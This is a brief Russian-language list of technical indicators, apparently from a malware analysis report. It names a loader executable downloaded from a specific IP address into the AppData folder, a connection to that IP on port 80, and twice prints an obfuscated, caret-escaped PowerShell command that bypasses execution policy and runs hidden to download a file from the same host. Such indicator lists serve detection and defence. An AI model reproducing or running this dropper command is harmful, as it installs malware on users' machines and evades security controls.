Техническая информация
- http://185.165.31.75/ldr.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^Ow^ErsHell^.^E^Xe^ -^ex^ECu^TionpO^Lic^y^ ^by^pa^s^S -no^PRo^FilE ^-wiNDO^W^Sty^lE hID^dEn (^new-oB^JEcT SY^StE^m.Ne^T^.^WeB^CL^IeNt).^Dow^n^LOADF^ILE^(^'http://185.165.31.75/...
- '18#.#65.31.75':80
- '<SYSTEM32>\cmd.exe' /c "p^Ow^ErsHell^.^E^Xe^ -^ex^ECu^TionpO^Lic^y^ ^by^pa^s^S -no^PRo^FilE ^-wiNDO^W^Sty^lE hID^dEn (^new-oB^JEcT SY^StE^m.Ne^T^.^WeB^CL^IeNt).^Dow^n^LOADF^ILE^(^'http://185.165.31.75/...' (со скрытым окном)